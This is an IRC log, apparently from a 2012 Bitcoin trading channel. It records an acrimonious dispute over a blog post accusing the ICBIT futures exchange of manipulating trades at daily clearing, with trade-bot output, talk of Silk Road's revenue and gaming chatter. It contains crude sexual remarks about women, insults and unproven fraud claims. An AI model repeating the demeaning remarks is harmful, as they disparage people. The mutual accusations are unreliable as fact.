imagine this is ICBIT's own actions, they could be done at any other time of a day Nov 17 19:54:29 not really. the allegation is that you close the book for customers at 30 seconds before 20:00 Nov 17 19:54:41 <_Fireball> but it doesn't give me any profit! Nov 17 19:54:43 then do some fake trading, then reopen the book 10 seconds after 20:00 Nov 17 19:54:51 <_Fireball> margin call can't happen during clearing Nov 17 19:54:55 <_Fireball> because trading is stopped Nov 17 19:55:01 it possibly gives you a profit through the mechanism delineated at the end of the article, Nov 17 19:55:09 but whether it does or it doesn't isn't really relevant Nov 17 19:56:47 <_Fireball> uhm Nov 17 19:57:25 <_Fireball> honestly, by reading your blog post, I see that you have little idea how futures exchanges work Nov 17 19:57:32 that's fine. Nov 17 19:57:42 <_Fireball> and I'm explaining it to you ;-) Nov 17 19:58:23 <_Fireball> so, would you be a man and write an apology? Nov 17 19:58:35 you're joking, right ? Nov 17 20:00:02 <_Fireball> not at all Nov 17 20:00:16 <_Fireball> I can explain once again Nov 17 20:00:23 <_Fireball> why "facts" you mentioned make no sense Nov 17 20:00:33 < mircea_popescu> https://bitcointalk.org/index.php?topic=124441.msg1340625#msg1340625 << why doesn't he take that OP as a suggestion and move on? does he really think your pr lady is making the world a worse place? Nov 17 20:00:55 smickles i have no idea. Nov 17 20:01:23 i think he just got blindsided. he thought bfl is the greatest business in btc Nov 17 20:01:31 an easy mistake to make, everyone thinks his kids are the smartest. Nov 17 20:02:09 <_Fireball> "Their volume is listed as 320k USD, which makes absolutely zero sense" - all trades are logged, however obviously it's not daily volume, but total volume of a contract. Nov 17 20:02:30 <_Fireball> you can check it if you make a trade, the total volume would be updated. Nov 17 20:02:58 _Fireball it makes zero sense because a. it's not clear if you mean per day, week month, year Nov 17 20:03:05 and because it doesn't seem to be updated. Nov 17 20:03:09 and for other reasons. Nov 17 20:03:17 "all trades are logged" you say. where ? Nov 17 20:03:23 <_Fireball> total since the introduction of this contract Nov 17 20:03:52 <_Fireball> they are time limited, you know. It expires in a month Nov 17 20:04:03 yes well, other than glbse nobody does this. Nov 17 20:04:15 volume is reported by a fixed time interval. like a month, or a day. Nov 17 20:04:32 <_Fireball> have a look at the chart then Nov 17 20:04:38 i understand _why_ you do it this way, if you said 40 BTC/day it would look poor but honest, but anyway. Nov 17 20:04:41 <_Fireball> it's slightly broken though Nov 17 20:04:49 <_Fireball> but it shows correct volume if you look at it day per day Nov 17 20:05:01 but we're not discussing that. Nov 17 20:05:08 i didn't say the chart makes zero sense. Nov 17 20:05:13 <_Fireball> yes, anyway, let's discuss one thing Nov 17 20:05:20 (tho i could have said it makes zero sense to put charts behind a pw) Nov 17 20:05:22 <_Fireball> what's the point of your, let me say, not very good article? Nov 17 20:05:37 the article stands on its own, as far as i can tell. Nov 17 20:05:42 <_Fireball> it's quite clear that you can't back any accusation Nov 17 20:05:46 <_Fireball> and it's full of false facts Nov 17 20:05:50 sigh. Nov 17 20:05:55 <_Fireball> yes, indeed sigh Nov 17 20:06:01 <_Fireball> if I would be scammer, I would not come here Nov 17 20:06:02 <_Fireball> to you Nov 17 20:06:03 alright, carry on. Nov 17 20:06:05 <_Fireball> with good intentions Nov 17 20:06:19 no, actually, in general scammers do come to me with a head full of steam in the first pass Nov 17 20:06:38 because they fail to realise that i employ people, that i've had the affidavit vetter by trade engine experts before posting and on and on Nov 17 20:06:39 <_Fireball> my head is not full of steam at all Nov 17 20:06:42 people imagine i'm like them. Nov 17 20:07:23 < mircea_popescu> smickles https://bitcointalk.org/index.php?topic=50817.msg1341151#msg1341151 <<< yeah, another "that couldn't possibly have happened" Nov 17 20:07:46 smickles yet again the problem with the website model. customer says X. site says Y. how do we verify this ? Nov 17 20:08:17 <_Fireball> mircea_popescu, is this blackmailing? Nov 17 20:08:39 weren't you complaining earlier you didn't get any mail ? Nov 17 20:08:48 it has to be one or the other you know. Nov 17 20:08:59 there's no such thing as absentee blackmail. Nov 17 20:09:49 LOL Nov 17 20:09:51 quoted Nov 17 20:09:56 absentee blackmail Nov 17 20:09:57 omg Nov 17 20:15:45 <_Fireball> oh well Nov 17 20:17:35 <_Fireball> so, let me confirm Nov 17 20:17:40 [MPEX] [S.MPOE] 10154 @ 0.00050036 = 5.0807 BTC [+] Nov 17 20:17:42 [MPEX] [S.MPOE] 19300 @ 0.00050012 = 9.6523 BTC [-] Nov 17 20:17:42 [MPEX] [S.MPOE] 32600 @ 0.00049982 = 16.2941 BTC [-] Nov 17 20:17:43 [MPEX] [S.MPOE] 34750 @ 0.00049966 = 17.3632 BTC [-] Nov 17 20:17:45 [MPEX] [S.MPOE] 29950 @ 0.0004995 = 14.96 BTC [-] Nov 17 20:17:46 [MPEX] [S.MPOE] 11591 @ 0.00049855 = 5.7787 BTC [-] Nov 17 20:17:47 [MPEX] [S.MPOE] 12109 @ 0.00049777 = 6.0275 BTC [-] Nov 17 20:17:48 <_Fireball> mircea_popescu, you are not going to issue an apology, right? Nov 17 20:17:48 [MPEX] [S.MPOE] 7550 @ 0.00049585 = 3.7437 BTC [-] Nov 17 20:17:49 [MPEX] [S.MPOE] 3419 @ 0.00048619 = 1.6623 BTC [-] Nov 17 20:17:50 [MPEX] [S.MPOE] 23333 @ 0.00048608 = 11.3417 BTC [-] Nov 17 20:17:51 [MPEX] [S.MPOE] 66600 @ 0.00048597 = 32.3656 BTC [-] Nov 17 20:17:52 [MPEX] [S.MPOE] 35150 @ 0.00048571 = 17.0727 BTC [-] Nov 17 20:17:52 [MPEX] [S.MPOE] 39800 @ 0.00048554 = 19.3245 BTC [-] Nov 17 20:17:53 <_Fireball> this is the last time I'm asking Nov 17 20:17:53 [MPEX] [S.MPOE] 45600 @ 0.00048536 = 22.1324 BTC [-] Nov 17 20:17:54 [MPEX] [S.MPOE] 20650 @ 0.00048527 = 10.0208 BTC [-] Nov 17 20:17:55 [MPEX] [S.MPOE] 9800 @ 0.00048516 = 4.7546 BTC [-] Nov 17 20:17:56 [MPEX] [S.MPOE] 34624 @ 0.00048515 = 16.7978 BTC [-] Nov 17 20:17:57 [MPEX] [S.MPOE] 16900 @ 0.00048515 = 8.199 BTC [-] Nov 17 20:17:58 [MPEX] [S.MPOE] 41688 @ 0.00048509 = 20.2224 BTC [-] Nov 17 20:17:59 [MPEX] [S.MPOE] 4432 @ 0.00048504 = 2.1497 BTC [-] Nov 17 20:18:14 rather than posturing you'd be much better served by addressing the actual points. Nov 17 20:18:20 chief among which, where are your trades logged ? Nov 17 20:18:44 <_Fireball> in an internal database, haha Nov 17 20:19:01 <_Fireball> anyway, what's the list of the actual points? Nov 17 20:19:18 <_Fireball> besides trades log (I can export and publish it, if needed) Nov 17 20:19:19 hi _Fireball thanks for joining us here :) do you think you could work with kakobrekla to get streaming icbit futures trades in the chan? Nov 17 20:19:30 <_Fireball> smickles - yep, with pleasure Nov 17 20:19:45 that you close the book half a minute before daily settlement, that you then proceed to execute fake trades on your own account, that you then reopen the book after daily settlement cutoff Nov 17 20:19:54 <_Fireball> smickles, I'd be more glad if mircea_popescu would stop assuming ICBIT is "scammy piece of shit" ;-) Nov 17 20:20:28 <_Fireball> mircea_popescu, ok, let's make it clear: it's NOT settlement! Nov 17 20:20:30 [MPEX] [S.DICE] 5000 @ 0.00339944 = 16.9972 BTC [+] Nov 17 20:20:37 <_Fireball> contracts are NOT settled a 20:00 GMT Nov 17 20:20:40 <_Fireball> is that clear now? Nov 17 20:20:44 [MPEX] [S.BVPS] 1200 @ 0.00280004 = 3.36 BTC [-] Nov 17 20:20:45 <_Fireball> you can check your own logs Nov 17 20:20:50 <_Fireball> you can confirm and verify Nov 17 20:21:03 listen. is there some event occuring on your site every day at 20:00 ? Nov 17 20:21:16 <_Fireball> settlement day is 15.12.2012 Nov 17 20:21:25 <_Fireball> yes, it's called clearing, it's a technical event Nov 17 20:21:30 yes yes. you settle daily inasmuch as you keep moving margins around. Nov 17 20:21:35 heh, mircea_popescu technically settlement is jargon Nov 17 20:21:42 it has specific meaning Nov 17 20:21:43 ignoring the fact you've got your terminology borkt. Nov 17 20:22:17 <_Fireball> http://en.wikipedia.org/wiki/Clearing_(finance) Nov 17 20:22:30 <_Fireball> vs Nov 17 20:22:31 <_Fireball> http://en.wikipedia.org/wiki/Settlement_(finance) Nov 17 20:22:37 anyway, _Fireball so you suspect connection failure when I still saw the live depth updating? Nov 17 20:23:22 dear old wikipedia. Nov 17 20:23:43 <_Fireball> smickles, that sometimes happens, I'm going to investigate the reasons, but ften it's just connection failure Nov 17 20:24:08 _Fireball: I know the net does weird things sometimes, and I don't know your system thouroughly, but you can see why mircea_popescu is suspicious (to say the least) Nov 17 20:24:17 <_Fireball> it's in our internal issue tracker, so it's being worked on, and I will report if we find something on our end Nov 17 20:29:05 <_Fireball> kakobrekla, could you send me details how to add futures trades reporting to this channel? Nov 17 20:29:27 <_Fireball> I PMed you my email Nov 17 20:30:27 basically you output them to a twitter channel and the bot sucks them from there. Nov 17 20:30:35 <_Fireball> ah, that's cool! Nov 17 20:36:48 <_Fireball> mircea_popescu, so? Nov 17 20:37:06 <_Fireball> are we past the point of clearing vs settlement differences? Nov 17 20:43:59 [MPEX] [O.BTCUSD.C130T] 119 @ 0.09306063 = 11.0742 BTC [+] Nov 17 20:51:54 mircea_popescu: i booked passage to romania, lets go see romanian titties!!! Nov 17 20:55:47 thestringpuller, http://24.media.tumblr.com/tumblr_mcdhhzni351rehruqo1_500.png Nov 17 20:56:56 ... Nov 17 20:57:01 oh jurov Nov 17 20:57:16 mircea_popescu, send the wrath of pr back on forums Nov 17 20:57:16 https://bitcointalk.org/index.php?topic=124441.20;topicseen Nov 17 20:57:22 i want to read continiuation. Nov 17 20:59:21 kakobrekla, you can ensure that by inciting katz to join Nov 17 20:59:29 haha Nov 17 20:59:55 mircea_popescu is too busy sleeping with her. Nov 17 21:04:02 mpoe-pr is a little off Nov 17 21:04:12 silk road has much more revenue than mpex Nov 17 21:04:49 1.2M a year last time i checked Nov 17 21:05:51 inaba: until you start shipping asic STFU. Nov 17 21:05:56 New bitcoin service startup, please take a look! https://btcjam.com/listings/584 Nov 17 21:06:05 crackhead. Nov 17 21:06:39 thank you kakobrekla, i think highly of you as well ;-) Nov 17 21:06:44 its like hashking would come to patricks thread Nov 17 21:06:50 saying patrick is scammer Nov 17 21:06:56 lucidlepidoptera, that was not ment for you Nov 17 21:07:05 im still ranting about inabas halicunations. Nov 17 21:07:10 brb Nov 17 21:07:14 ah, i was wondering Nov 17 21:07:19 <_Fireball> kakobrekla, pls send me those details Nov 17 21:07:24 <_Fireball> about assbot Nov 17 21:07:29 _Fireball i wrote back to you in pm Nov 17 21:07:31 brb 10min Nov 17 21:07:43 <_Fireball> ahh thanks Nov 17 21:07:46 <_Fireball> ok cya Nov 17 21:08:22 mpex isnt that big tho Nov 17 21:08:54 kakobrekla: which was his point, even though he is nincumpoop Nov 17 21:12:27 umm what did i miss ? Nov 17 21:14:28 me coming to romania to fuck bitches Nov 17 21:14:36 i need to learn romanian first Nov 17 21:15:25 lol cool Nov 17 21:17:54 thestringpuller how would you even know what their revenue was ? Nov 17 21:18:14 a statician wrote a whitepaper on it. im looking for it now Nov 17 21:18:18 yaya Nov 17 21:18:19 Revenue : 12`755.59310383 BTC, of which : Nov 17 21:18:24 that's s.mpoe for october. Nov 17 21:18:33 seems to be a little over 1.2mn per year. Nov 17 21:20:44 is that pure revenue? money the bot made no? Nov 17 21:21:35 ;;calc 146000 * 12 Nov 17 21:21:35 1752000 Nov 17 21:22:28 thats silk roads annual take home Nov 17 21:22:53 based on : http://www.newscientist.com/blogs/onepercent/2012/08/silk-road-bitcoin-illegal.html Nov 17 21:23:45 ;;ticker Nov 17 21:23:46 BTCUSD ticker | Best bid: 11.66611, Best ask: 11.73287, Bid-ask spread: 0.06676, Last trade: 11.66610, 24 hour volume: 22340.79606444, 24 hour low: 11.42000, 24 hour high: 11.80000, 24 hour vwap: 11.65028 Nov 17 21:23:53 ;;calc 12755.5931038 * 12 * 11.66 Nov 17 21:23:54 1784762.58708 Nov 17 21:23:56 moar. Nov 17 21:26:07 can i see smickles mpoe financials i cant find them on your blog cause i dont speakuh da romanian Nov 17 21:27:07 lucidlepidoptera: what's the difference between QuickBitcoins.net and ziggap.com? Nov 17 21:27:37 thestringpuller https://bitcointalk.org/index.php?topic=64962.80 Nov 17 21:28:20 FabianB_: we sold quicbitcoins, ziggap will be similar but much better ;-) Nov 17 21:29:09 lucidlepidoptera: who bought it? doesn't seem to work anymore Nov 17 21:29:38 lucidlepidoptera: how are you planning to bypass moneygram fees Nov 17 21:29:48 The buyer is wanting to remain undisclosed. Nov 17 21:29:50 [MPEX] [S.MPOE] 19050 @ 0.00049771 = 9.4814 BTC [+] Nov 17 21:29:51 [MPEX] [S.MPOE] 7702 @ 0.00050049 = 3.8548 BTC [+] Nov 17 21:29:52 mircea_popescu: that's dividend information I wanted to see smickles reports Nov 17 21:29:53 ya srsly, no "no compete" clause ?! Nov 17 21:29:53 [MPEX] [S.MPOE] 23248 @ 0.00050058 = 11.6375 BTC [+] Nov 17 21:30:02 thestringpuller o, on mpoe.etf ? Nov 17 21:30:04 mircea_popescu: nope Nov 17 21:30:05 ;;google mpoe.etf Nov 17 21:30:07 [GLBSE] MPOE ETF - September Financial Report Available: ; Most of Many (MostOfMany) on Twitter: ; Mike Carver (smickles) on Twitter: Nov 17 21:30:10 Moneygram charges the customer a flat fee at point of sell for a billpay Nov 17 21:30:14 thestringpuller: mpoe.etf is dead Nov 17 21:30:17 They dont charge the biller anything. Nov 17 21:30:27 it was a glbse asset Nov 17 21:30:34 It's like 3$ish Nov 17 21:30:47 thestringpuller: you do want to look at https://bitcointalk.org/index.php?topic=64962.msg1230084#msg1230084 Nov 17 21:30:54 smickles: you had written financials for mpoe's financials that used to be on polimedia blog Nov 17 21:30:57 am i confused? Nov 17 21:30:58 it is S.MPOE's report in english Nov 17 21:31:12 there we go Nov 17 21:31:14 yeah, a bit confused Nov 17 21:31:17 thank you smickles Nov 17 21:31:24 np :) Nov 17 21:31:42 thestringpuller: Do you have any other questions which I might be able to answer? Nov 17 21:33:51 aethero: so you signed up for moneygram's bill pay service? Nov 17 21:34:19 mircea_popescu: it seems that the total profit was 4k btc Nov 17 21:34:48 thestringpuller thought we were discussing revenue ? Nov 17 21:34:55 when I said revenue for silk road that was the total take home I apologize for the confusion Nov 17 21:35:02 a ok Nov 17 21:35:13 but who can compete with the mob Nov 17 21:35:14 well, the profit varies wildly for mpoe, but it's never been more than 40%ish of revenue so Nov 17 21:35:21 sr takes 10% + seller seat fees Nov 17 21:35:31 pigeons: exactly Nov 17 21:35:34 No we haven't yet, but we are currently in touch with a person at MoneyGram International, who is waiting for us to pull the trigger on this. Nov 17 21:35:36 thestringpuller: not aware of mob involvement Nov 17 21:36:45 pigeons right. like you would be :D Nov 17 21:37:27 so server load costs can be no more than $5000 a year so they still have a $130,000 take home Nov 17 21:37:33 per month Nov 17 21:37:41 but again who can compete with selling drugs Nov 17 21:37:44 everyone wants drugs Nov 17 21:37:48 i don't. Nov 17 21:38:07 mircea_popescu: well sr is against the mob and the mob is against it, for business reasons. don't believe me and obviously i'm not in a postition to prove it, but when i see things thrown out there i respond Nov 17 21:38:21 i was joking about the mob involvement Nov 17 21:38:25 ok Nov 17 21:38:28 :) Nov 17 21:38:44 i wasn't particularly serious either, just saying, not like the mob advertises Nov 17 21:39:00 "this illegal business protected by teh mafia" Nov 17 21:39:10 sarcasm doesn't translate here usually Nov 17 21:39:42 all good Nov 17 21:40:21 what I meant by everyone wants drugs is it is "demographicaless" Nov 17 21:40:30 besides, "the mob". there;'s what, fiddy billion factions. i don't think they even know anymore. Nov 17 21:41:18 still, the one point of concern was that their weapons store closed for lack of business. Nov 17 21:41:43 this may seem to indicate they don't really have much clientele. it could be just puffery, buncha kids selling bath salts and pills. Nov 17 21:41:56 note that i have no idea and don't really care either way. Nov 17 21:43:33 i guess usually only first few trades are done via sr, rest of them directly Nov 17 21:43:43 so it depends on influx of newbs Nov 17 21:45:58 ya but practically speaking, too easy to run a sting. Nov 17 21:46:16 the market for narcotics is a very tough racked to break into. Nov 17 21:50:25 depends Nov 17 21:50:43 recently it is unaffordable to sell drugs Nov 17 21:50:53 we can thank freakanomics for that Nov 17 21:54:45 god dammit mircea_popescu, i'm sending you 1 usd worth of btc Nov 17 21:54:52 why ? Nov 17 21:56:14 your paywall Nov 17 21:56:19 prolly it's all that's left from icbit account? Nov 17 21:56:25 lol Nov 17 21:57:20 lol! Nov 17 21:58:29 so icbit is fucked Nov 17 21:58:30 ?* Nov 17 21:58:45 ;;gribble 1/[ticker --last] Nov 17 21:58:46 yes I am gribble. why do you keep bothering me? Nov 17 21:58:52 ;;calc 1/[ticker --last] Nov 17 21:58:53 0.0852030431119 Nov 17 21:59:29 lol Nov 17 22:00:26 ;;ticker Nov 17 22:00:28 BTCUSD ticker | Best bid: 11.67001, Best ask: 11.73699, Bid-ask spread: 0.06698, Last trade: 11.73700, 24 hour volume: 21863.28175201, 24 hour low: 11.42000, 24 hour high: 11.80000, 24 hour vwap: 11.65305 Nov 17 22:00:42 ;;bc,eur Nov 17 22:00:42 Error: "bc,eur" is not a valid command. Nov 17 22:01:02 ;;google eur usd Nov 17 22:01:03 EURUSD=X: Summary for EUR/USD- Yahoo! Finance: ; EUR/USD - Google: ; EUR to USD Exchange Rate - Bloomberg: Nov 17 22:01:16 ;;bc,convert eur Nov 17 22:01:16 1 BTC = 11.73700 U.S. dollars = 9.22212619 Euros Nov 17 22:01:40 ty! Nov 17 22:01:48 np Nov 17 22:09:44 see pigeons, smickles bought Trilema credits :D Nov 17 22:10:32 what are Trilema credits? Nov 17 22:11:04 if you read a buncha posts it pops this paid content thign Nov 17 22:11:06 thestringpuller: mircea_popescu has a paywall on his blog Nov 17 22:11:28 you get 5 or so free, each time you read an article it ticks one off, Nov 17 22:11:33 *5 free per week Nov 17 22:11:33 5 a week ya Nov 17 22:11:50 1 credit = .0001 usd iirc Nov 17 22:12:40 a paywall to read the blog? Nov 17 22:12:48 yeah Nov 17 22:13:32 how capitalistic Nov 17 22:14:03 can't i just connect from other computers? Nov 17 22:14:05 i actually am the first guy online to charge for content Nov 17 22:14:07 and get around the paywall? Nov 17 22:14:09 the system is in place since like 2010 Nov 17 22:14:14 thestringpuller sure. Nov 17 22:14:21 if it's worth the 0.05 cents to you or w/e Nov 17 22:14:26 lol Nov 17 22:15:50 <_Fireball> " so icbit is fucked" Nov 17 22:15:52 <_Fireball> no, it's not Nov 17 22:16:00 <_Fireball> mircea_popescu is the one who is f..cked :-) Nov 17 22:16:15 are people about to lose a lot of money? Nov 17 22:16:31 <_Fireball> why? Nov 17 22:17:04 thestringpuller the theory goes that some mysterious "manipulator" who had been keeping the price low on the site is losing all the money. not the site itself. Nov 17 22:17:17 lucky that after wreaking havoc for a while he was scared by a trilema article. Nov 17 22:17:30 can I see this trilema article? Nov 17 22:18:08 [MPEX] [O.BTCUSD.P110T] 44 @ 0.07123871 = 3.1345 BTC [-] Nov 17 22:18:42 also, http://ist1-1.filesor.com/pimpandhost.com/1/_/_/_/1/1/d/m/P/1dmPZ/arch.jpg Nov 17 22:18:52 thestringpuller http://trilema.com/2012/icbitse-the-bucket-shop/ Nov 17 22:19:11 Why would someone even *want* to keep the price low? Nov 17 22:19:24 they have a short position Nov 17 22:19:34 and are trying to force liquidate longs Nov 17 22:19:36 <_Fireball> aethero, that one who has big "short" position Nov 17 22:20:12 i don't know that many bitcoin bears. Nov 17 22:20:31 <_Fireball> mircea_popescu, the world is not limited by your personal knowledge Nov 17 22:20:35 it's like a double down in blackjack Nov 17 22:21:25 _Fireball well in this case, the frequency of bitcoin bears is limited by the fact that people who have bitcoins tend to believe in them too, or else they'd have never bought any. Nov 17 22:21:48 <_Fireball> mircea_popescu, do you realize there is such thing as arbitrage? Nov 17 22:21:54 <_Fireball> or hedging the risk using futures/ Nov 17 22:21:55 <_Fireball> ? Nov 17 22:22:54 surely. Nov 17 22:24:35 <_Fireball> then you would not be surprised by people "shorting" bitcoins Nov 17 22:25:11 people can short 100k bitcoins synthetically via options on the spot, and probably about the same in traditional borrow-short positions over the otc if they are well known Nov 17 22:25:18 why would anyone want the 1 dollar slippage ?! Nov 17 22:26:09 <_Fireball> what does slippage has to do with short positions? Nov 17 22:26:36 <_Fireball> ah, about the current rate Nov 17 22:26:51 <_Fireball> the rate dropped *because* of the excessive shorting Nov 17 22:27:24 you are proposing the theory whereby "someone" sold btc all the way to 10.02 YESTERDAY. his position covers a few hundred btc. Nov 17 22:27:32 if he's looking to hedge there's better avenues. Nov 17 22:27:44 <_Fireball> you are proposing theories Nov 17 22:27:46 <_Fireball> I have facts Nov 17 22:31:20 <_Fireball> anyway, you seem to be a troll Nov 17 22:32:21 <_Fireball> https://bitcointalk.org/index.php?topic=102333.0 is that true? Nov 17 22:34:12 <_Fireball> also, https://bitcointalk.org/index.php?topic=50817.0 - this is the original topic about ICBIT, dated Nov 03, 2011 Nov 17 22:34:14 dude, srsly. you're wasting your time. Nov 17 22:34:35 <_Fireball> you "created" MPex https://bitcointalk.org/index.php?topic=76239.0 Apr 11, 2012 Nov 17 22:34:50 <_Fireball> so I demand apologies Nov 17 22:35:26 <_Fireball> ICBIT is obviously a way more mature service than your "exchange" Nov 17 22:35:31 <_Fireball> if it could be called so at all Nov 17 22:35:41 <_Fireball> because I have seen almost 0 positive opinions about it Nov 17 22:35:41 Why can't we just all get along Nov 17 22:36:01 <_Fireball> thestringpuller, I requested apologies from mircea_popescu already three times in a row Nov 17 22:36:08 <_Fireball> either he's a clinical idiot Nov 17 22:36:09 i like it. its not perfect, but nothing's better yet Nov 17 22:36:18 well, do it five times, who knows, maybe repeating it helps. Nov 17 22:36:19 <_Fireball> or he's just a troll Nov 17 22:36:41 trolls get off on other people being upset Nov 17 22:36:45 mircea just doesn't care Nov 17 22:36:52 he dgaf Nov 17 22:36:57 no he trolls a little :) Nov 17 22:37:17 a little a lot Nov 17 22:37:20 tomato tomato Nov 17 22:37:24 <_Fireball> haha Nov 17 22:37:49 <_Fireball> as a trader, after speaking to such person, I would keep away from anything closely related to Popescu Nov 17 22:37:59 <_Fireball> he doesn't understand even basic financial stuff as we saw above Nov 17 22:38:03 yeah see that leaves us with nothing Nov 17 22:38:07 <_Fireball> how could he create an exchange after all? Nov 17 22:38:37 maybe it's a big conspiracy Nov 17 22:38:42 and he cause the 1989 revolution Nov 17 22:38:49 <_Fireball> looks like it :-) Nov 17 22:38:50 and he didn't really create mpex Nov 17 22:38:52 heh srsly. you were just blown to bits and you're gonna what, bite my arms off ? bleed on me ? Nov 17 22:38:54 get real. Nov 17 22:39:13 its just a scratch. Nov 17 22:39:17 there was a mongolian soldier who after his swords broke used dead bodies to continue to fight Nov 17 22:39:28 kakobrekla: just a fleshwound Nov 17 22:39:34 smickles :) Nov 17 22:39:44 fleshwound? me spel gud Nov 17 22:39:59 werry gut Nov 17 22:40:15 i just watched life of brian earlier Nov 17 22:40:19 hehe Nov 17 22:40:24 there's this scene where the roman guard makes him fix his spelling Nov 17 22:40:33 cause it's not domus!!! Nov 17 22:40:36 lolyeah Nov 17 22:40:39 hehe Nov 17 22:41:12 ah but did you expect the spanish inquisition? Nov 17 22:41:24 actually... http://polimedia.us/bitcoin/faq.html#33 Nov 17 22:41:31 i been waiting for this soo long... Nov 17 22:41:47 :D Nov 17 22:42:01 i'm laughing so hard right now Nov 17 22:49:43 <_Fireball> ok guys, it was nice meeting you all (except popescu, of course) Nov 17 22:50:00 <_Fireball> when I have some free time, I will do live reporting via twitter Nov 17 22:53:35 sooo updated the faq! check out my fancy awards! http://polimedia.us/bitcoin/faq.html#33 Nov 17 22:54:37 why didn't he like me anyway ? i was nice enough... Nov 17 22:56:55 maybe he doesn't like romanian gangstas Nov 17 22:56:56 jk Nov 17 23:02:10 Cherries! Nov 17 23:03:44 Anything new with Glbse these days Nov 17 23:04:06 Ive pretty much stopped following anything bitcoin. Nov 17 23:04:13 nope Nov 17 23:04:29 Well that's poopy. Nov 17 23:04:47 you're telling me Nov 17 23:06:30 It's all Azelphur's fault, had he made the Mpex Passthrough website 6 months ago like he said we would all be rich. Nov 17 23:06:42 :P Nov 17 23:07:34 at least jurov has coinbr.com now Nov 17 23:08:05 azelphur is very lazy boi! Nov 17 23:08:31 but anyway Doffx you missed out on all the drama&outrage earlier. Nov 17 23:09:40 I think I was more saved from, rather than missed anything, however that's my opinion. Nov 17 23:09:44 :) Nov 17 23:10:34 lol Nov 17 23:10:44 guy was a couple steps from provoking me to a duel Nov 17 23:10:47 or breaking out in tears. Nov 17 23:11:10 Take 10 steps then draw your weapon sirs. Nov 17 23:11:13 i think if azelphur decided 6 months ago, now it would be in alpha, at most.. not a simple endeavor Nov 17 23:11:36 Oh I'm just nudging Azelphur because hes a cool guy. Nov 17 23:11:56 he is a cool guy, but lately he's all but dissapeared. Nov 17 23:12:01 I never expected anything from it even way back them but it was a good idea. Nov 17 23:12:02 a bit too cool now Nov 17 23:12:21 Hes prolly been playing Planetside. Nov 17 23:12:30 why can't he have found a gf Nov 17 23:12:40 I decided not to do it as I don't like my code handling large amounts of money Nov 17 23:12:46 would just be a constant source of lost sleep Nov 17 23:12:53 sleep is for women Nov 17 23:13:11 See there he is. Nov 17 23:13:26 :) Nov 17 23:13:29 Hes a shut in computer geek, no time for girls they eat up all your time. Nov 17 23:13:44 That was redundant. Nov 17 23:13:52 Hi captain redundant Nov 17 23:13:58 haha Nov 17 23:14:15 What games are you playing anyhow Azelphur? Nov 17 23:14:26 I've been playing the TF2 Linux beta :P Nov 17 23:14:44 Oh nice. Nov 17 23:14:56 Isint steam going to be Linux ready soon too? Nov 17 23:15:07 steam is part of said beta Nov 17 23:15:08 :) Nov 17 23:15:16 I'm curious how that will work I should look in to it again/ Nov 17 23:16:01 http://polimedia.us/dtng/c/src/135318695394.jpg Nov 17 23:16:02 it works, I'm using it, AMA Nov 17 23:16:06 im starting to think my driver sucks Nov 17 23:26:41 Azelphur: what's there to ask? you already said it works. Nov 17 23:26:53 smickles: :P Nov 17 23:27:12 heh, it also works under wine with the -opengl launch command Nov 17 23:27:30 smickles: it runs faster on native Linux than it does on Windows Nov 17 23:27:34 so, huge improvement Nov 17 23:27:35 porlly Nov 17 23:29:31 definitely, I have both :P Nov 17 23:34:04 [MPEX] [O.BTCUSD.C120T] 5 @ 0.1432 = 0.716 BTC [-] Nov 17 23:34:06 [MPEX] [O.BTCUSD.C120T] 10 @ 0.2201083 = 2.2011 BTC [+] Nov 17 23:42:09 ;;ticker Nov 17 23:42:09 BTCUSD ticker | Best bid: 11.72000, Best ask: 11.72795, Bid-ask spread: 0.00795, Last trade: 11.72000, 24 hour volume: 20393.60504399, 24 hour low: 11.52000, 24 hour high: 11.80000, 24 hour vwap: 11.66542 Nov 17 23:42:12 ;;bc,24hprc Nov 17 23:42:13 11.65 Nov 17 23:46:33 Ahh Limited Invite 1000 people Nov 17 23:46:40 And you made it in Azelphur? Nov 17 23:46:45 Wow impressive Nov 17 23:46:49 Doffx: "made it in" Nov 17 23:47:27 I cant use playonlinux right now Nov 17 23:48:04 the New nvidia drivers have the 32bit multi inside them but it doesn’t seem to know that Nov 17 23:48:20 I'm not sure how you get around that yet. Nov 17 23:48:58 PlayOnLinux is unable to find 32bits OpenGL libraries. Nov 17 23:49:04 I'm using it on 64bit nvidia proprietary Nov 17 23:49:38 Yeah I was before as well, but I had loaded the 32 bit glx and those are gone now rolled up in to the main driver Nov 18 00:11:19 http://www.pleated-jeans.com/2012/02/17/this-crazy-girls-texting-tops-them-all/ Nov 18 00:11:22 this is kinda lulzy. Nov 18 00:17:46 oh yeah https://bitcointalk.org/index.php?topic=74216.msg1341673#msg1341673 Nov 18 00:18:48 i will never see my ss coins. Nov 18 00:19:00 goddamn nazis. Nov 18 00:21:27 kakobrekla: well, once i consolidate them, you can see them all you want Nov 18 00:21:43 heh, lost nazi coins Nov 18 00:22:15 smickles Nov 18 00:22:21 i want to see the private parts of em Nov 18 00:22:23 ;) Nov 18 00:23:37 :o Nov 18 00:23:53 jezus mircea_popescu that link, it goes on forever Nov 18 00:25:54 meh redditors. Nov 18 00:25:57 sex is overrated. Nov 18 00:27:34 smickles the link that keeps on giving Nov 18 00:28:39 how much capital in the ss thing ? Nov 18 00:29:28 under 400 in btc and about 300 worth of obligations to ss Nov 18 00:29:59 bitter but not the end of the world. Nov 18 01:01:04 [MPEX] [S.MPOE] 40150 @ 0.00049704 = 19.9562 BTC [-] Nov 18 01:01:05 [MPEX] [S.MPOE] 1968 @ 0.00049729 = 0.9787 BTC [+] Nov 18 01:21:05 lol Nov 18 01:21:11 kakobrekla: funny Nov 18 01:22:16 smickles: you around? Nov 18 01:26:56 thestringpuller: yup Nov 18 01:28:11 coding and waiting for a chain to sync Nov 18 01:28:22 ;;ticker Nov 18 01:28:22 BTCUSD ticker | Best bid: 11.72288, Best ask: 11.72418, Bid-ask spread: 0.00130, Last trade: 11.72288, 24 hour volume: 19759.87479185, 24 hour low: 11.52000, 24 hour high: 11.80000, 24 hour vwap: 11.67289 Nov 18 01:30:24 ;;google gpg contracts Nov 18 01:30:25 GPG contracts pe Trilema - Un blog de Mircea Popescu.: ; GPG Chapter II: ; FAQs - National Science Foundation: Nov 18 01:30:30 ok, i rule. Nov 18 01:34:02 i will google warfare you Nov 18 01:39:58 go ahead, that domain is a fucking battleship Nov 18 01:42:57 TheButterZone: if you ever decide to leave -otc are you going to unrate everyone first?http://pastebin.com/rjchDV9v Nov 18 01:43:00 [B[B[B Nov 18 01:43:02 llllcccccc5;3~cccccv Nov 18 01:43:05 [B[B[B Nov 18 01:43:53 ? Nov 18 01:44:37 Is it human? Nov 18 01:44:42 clipboard issues Nov 18 